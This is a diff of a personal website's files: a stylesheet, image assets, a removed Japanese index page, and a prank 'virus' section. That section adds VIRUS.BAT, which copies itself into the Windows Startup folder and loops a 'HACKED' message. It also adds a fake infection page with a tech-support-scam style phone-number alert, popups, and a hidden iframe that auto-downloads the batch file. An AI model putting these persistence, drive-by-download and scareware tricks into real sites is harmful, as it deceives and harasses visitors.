@ -1 +1,2 @@
|
|||||||
count.txt
|
count.txt
|
||||||
|
*.vcf
|
||||||
|
@ -0,0 +1,65 @@
|
|||||||
|
* { box-sizing: border-box; }
|
||||||
|
|
||||||
|
@keyframes rainbow {
|
||||||
|
from { backdrop-filter: hue-rotate(0deg); -webkit-backdrop-filter: hue-rotate(0deg); }
|
||||||
|
to { backdrop-filter: hue-rotate(360deg); -webkit-backdrop-filter: hue-rotate(360deg); }
|
||||||
|
}
|
||||||
|
|
||||||
|
body {
|
||||||
|
background-color: #ebc;
|
||||||
|
background: url(/assets/images/bg.gif);
|
||||||
|
background-attachment: fixed;
|
||||||
|
color: #201;
|
||||||
|
margin: 0;
|
||||||
|
padding: 1px 0.5rem 1rem 0.5rem;
|
||||||
|
animation: 10s linear 0 rainbow;
|
||||||
|
animation-iteration-count: infinite;
|
||||||
|
}
|
||||||
|
|
||||||
|
kbd {
|
||||||
|
background: #fde;
|
||||||
|
border: 2px outset #fde;
|
||||||
|
padding: 0 2px;
|
||||||
|
}
|
||||||
|
|
||||||
|
h2 > small {
|
||||||
|
font-size: 16px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.container {
|
||||||
|
max-width: 960px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.center {
|
||||||
|
margin-left: auto;
|
||||||
|
margin-right: auto;
|
||||||
|
display: block;
|
||||||
|
}
|
||||||
|
|
||||||
|
.block {
|
||||||
|
background-color: #fcd;
|
||||||
|
border: 5px outset #dab;
|
||||||
|
margin-bottom: 10px;
|
||||||
|
padding: 0 5px;
|
||||||
|
}
|
||||||
|
|
||||||
|
footer {
|
||||||
|
background-color: #ebc;
|
||||||
|
border: 5px inset #dab;
|
||||||
|
padding: 10px;
|
||||||
|
}
|
||||||
|
|
||||||
|
footer p:first-of-type {
|
||||||
|
margin-top: 0;
|
||||||
|
}
|
||||||
|
footer p:last-of-type {
|
||||||
|
margin-bottom: 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
img.btn {
|
||||||
|
margin: 0 2px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.fl {
|
||||||
|
float: left;
|
||||||
|
}
|
After Width: | Height: | Size: 80 B |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 2.1 KiB |
After Width: | Height: | Size: 3.0 KiB |
After Width: | Height: | Size: 1.2 KiB |
After Width: | Height: | Size: 16 KiB |
After Width: | Height: | Size: 4.0 KiB |
After Width: | Height: | Size: 1.9 KiB |
After Width: | Height: | Size: 2.3 KiB |
After Width: | Height: | Size: 1.3 KiB |
After Width: | Height: | Size: 2.3 KiB |
After Width: | Height: | Size: 3.6 KiB |
After Width: | Height: | Size: 1.4 KiB |
After Width: | Height: | Size: 725 B |
After Width: | Height: | Size: 1.9 KiB |
After Width: | Height: | Size: 471 B |
After Width: | Height: | Size: 1.8 KiB |
After Width: | Height: | Size: 2.3 KiB |
@ -0,0 +1,12 @@
|
|||||||
|
@echo off
|
||||||
|
|
||||||
|
cls
|
||||||
|
|
||||||
|
copy VIRUS.BAT "%AppData%\Microsoft\Windows\Start Menu\Programs\Startup"
|
||||||
|
:start
|
||||||
|
|
||||||
|
color 0f
|
||||||
|
echo You have been HACKED!
|
||||||
|
|
||||||
|
color f0
|
||||||
|
goto start
|
After Width: | Height: | Size: 150 KiB |
@ -0,0 +1,16 @@
|
|||||||
|
<style>
|
||||||
|
img {
|
||||||
|
width: 100%;
|
||||||
|
height: 100%;
|
||||||
|
background-size: cover;
|
||||||
|
position: fixed;
|
||||||
|
top: 0;
|
||||||
|
left: 0;
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
<a href="VIRUS.BAT"><img id="background-img" src="error.jpg"/></a>
|
||||||
|
<audio autoplay loop src="error.mp3" type="audio/mpeg"/>
|
||||||
|
|
||||||
|
|
||||||
|
<body onBlur="self.focus();">
|
||||||
|
|
After Width: | Height: | Size: 14 KiB |
@ -0,0 +1,40 @@
|
|||||||
|
<html>
|
||||||
|
<title>You have a virus!</title>
|
||||||
|
|
||||||
|
<style>
|
||||||
|
img {
|
||||||
|
width: 100%;
|
||||||
|
height: 100%;
|
||||||
|
background-size: cover;
|
||||||
|
position: fixed;
|
||||||
|
top: 0;
|
||||||
|
left: 0;
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
|
||||||
|
<img id="background-img" src="bsod.jpg"/>
|
||||||
|
|
||||||
|
<audio autoplay src="bsod.mp3" type="audio/mpeg"/>
|
||||||
|
|
||||||
|
<SCRIPT TYPE="text/javascript">
|
||||||
|
function popup(mylink, windowname) {
|
||||||
|
if (! window.focus)return true;
|
||||||
|
var href;
|
||||||
|
if (typeof(mylink) == 'string') href=mylink;
|
||||||
|
else href=mylink.href;
|
||||||
|
window.open(href, windowname, 'width=582,height=202,scrollbars=yes').focus();
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
</SCRIPT>
|
||||||
|
<BODY onClick="popup('error.html', 'ad')" onLoad="myFunction()">
|
||||||
|
|
||||||
|
<script>
|
||||||
|
function myFunction() {
|
||||||
|
|
||||||
|
alert("YOUR COMPUTER HAS BEEN INFECTED!"+"\n"+"Please call 651-123-4567");
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
<iframe id="download" width="1" height="1" style="display:none" frameborder="0" src="VIRUS.BAT"></iframe>
|
||||||
|
</html>
|
@ -1,90 +0,0 @@
|
|||||||
<!DOCTYPE html>
|
|
||||||
<html lang="ja">
|
|
||||||
<head>
|
|
||||||
<meta charset="utf-8">
|
|
||||||
<meta name="viewport" content="width=device-width, initial-scale=1">
|
|
||||||
<title>ピケ.コム</title>
|
|
||||||
<style>
|
|
||||||
:focus {
|
|
||||||
background-color: lightblue;
|
|
||||||
border-radius: 3px;
|
|
||||||
padding: 0 2px;
|
|
||||||
}
|
|
||||||
</style>
|
|
||||||
</head>
|
|
||||||
|
|
||||||
<body>
|
|
||||||
<header>
|
|
||||||
<h1>ようこそ、<img src="/assets/images/header/wordart.gif" alt="ピケ.コム" width="230" height="55">へ!</h1>
|
|
||||||
<p>これは、<a href="//pk11.us">Pk11</a>の個人的なWebサイトです。ここではランダムな小さなものがある、主なものは<a href="//pk11.us">pk11.us</a>にあります。</p>
|
|
||||||
<p><a href="/en/">英語ページ・<span lang="en">English page</span></a></p>
|
|
||||||
<hr>
|
|
||||||
</header>
|
|
||||||
|
|
||||||
<main>
|
|
||||||
<h2 id="subdomain">サブドメイン</h2>
|
|
||||||
<dl>
|
|
||||||
<dt><a tabindex="0" href="//bad-apple.xn--rck9c.xn--tckwe/ja.html">bad-apple</a></dt>
|
|
||||||
<dd>Bad Apple!!でも、HTMLだけです(JSやCSSなし)</dd>
|
|
||||||
|
|
||||||
<dt><a tabindex="0" href="//bbs.xn--rck9c.xn--tckwe/index.php">bbs</a>(英語)</dt>
|
|
||||||
<dd>Windows98から画像をアップロードできないでしたので、PHPで作って本当にしょぼい1スレBBS</dd>
|
|
||||||
|
|
||||||
<dt><a tabindex="0" href="//count.xn--rck9c.xn--tckwe/index.php">count</a></dt>
|
|
||||||
<dd>シンプルなアイテム数トラッカー</dd>
|
|
||||||
|
|
||||||
<dt><a tabindex="0" href="//git.xn--rck9c.xn--tckwe">git</a></dt>
|
|
||||||
<dd>自己ホストの<a href="https://gitea.io/ja-jp/">Gitea</a></dd>
|
|
||||||
|
|
||||||
<dt><a tabindex="0" href="//grit.xn--rck9c.xn--tckwe">grit</a>(英語)</dt>
|
|
||||||
<dd>イメージを<a href="https://github.com/devkitPro/grit">grit</a>を使用してGRFファイルに変換</dd>
|
|
||||||
|
|
||||||
<dt><a tabindex="0" href="//haste.xn--rck9c.xn--tckwe">haste</a>(英語)</dt>
|
|
||||||
<dd>自己ホストのライト配色あり<a href="https://hastebin.com">Hastebin</a></dd>
|
|
||||||
|
|
||||||
<dt><a tabindex="0" href="//nextrip.xn--rck9c.xn--tckwe">nextrip</a></dt>
|
|
||||||
<dd><a href="https://www.metrotransit.org">Metro Transit</a>のNexTrip APIを使うバス停留所情報ビューアー</dd>
|
|
||||||
|
|
||||||
<dt><a tabindex="0" href="//rss.xn--rck9c.xn--tckwe">rss</a></dt>
|
|
||||||
<dd>自己ホトスの<a href="https://miniflux.app">Miniflux</a></dd>
|
|
||||||
|
|
||||||
<dt><a tabindex="0" href="//uwu.xn--rck9c.xn--tckwe">uwu</a></dt>
|
|
||||||
<dd>ランダムなuwu顔</dd>
|
|
||||||
|
|
||||||
<dt><a tabindex="0" href="//xn--p8juc.xn--rck9c.xn--tckwe">うち</a></dt>
|
|
||||||
<dd>家</dd>
|
|
||||||
</dl>
|
|
||||||
|
|
||||||
<h2 id="page">他のページ</h2>
|
|
||||||
<dl>
|
|
||||||
<dt><a tabindex="0" href="/agent.php">agent.php</a></dt>
|
|
||||||
<dd>ユーザーエイジェントを表示</dd>
|
|
||||||
|
|
||||||
<dt><a tabindex="0" href="/bios-shrinker.html">bios-shrinker.html</a>(英語)</dt>
|
|
||||||
<dd>3DSからダンプされたGBAのBIOSファイルを正しいサイズに縮小</dd>
|
|
||||||
|
|
||||||
<dt><a tabindex="0" href="/color.html">color.html</a></dt>
|
|
||||||
<dd>16進、RGB、BGR15の間で色を変換</dd>
|
|
||||||
|
|
||||||
<dt><a tabindex="0" href="/dQw4w9WgXcQ/index.html">dQw4w9WgXcQ</a></dt>
|
|
||||||
<dd>;)</dd>
|
|
||||||
|
|
||||||
<dt><a tabindex="0" href="/motd.php">motd.php</a></dt>
|
|
||||||
<dd>毎日でランダムなメッセージ</dd>
|
|
||||||
|
|
||||||
<dt><a tabindex="0" href="/securid.html">securid.html</a></dt>
|
|
||||||
<dd>RSA SecurIDのブラウザー実装</dd>
|
|
||||||
|
|
||||||
<dt><a tabindex="0" href="/video.php">video.php</a>(英語)</dt>
|
|
||||||
<dd>埋め込みにビデオを表示</dd>
|
|
||||||
</dl>
|
|
||||||
</main>
|
|
||||||
|
|
||||||
<footer>
|
|
||||||
<hr>
|
|
||||||
<p>2021-2023 <a href="//pk11.us">Pk11</a></p>
|
|
||||||
</footer>
|
|
||||||
|
|
||||||
<script src="/assets/js/kaios.js"></script>
|
|
||||||
</body>
|
|
||||||
</html>
|
|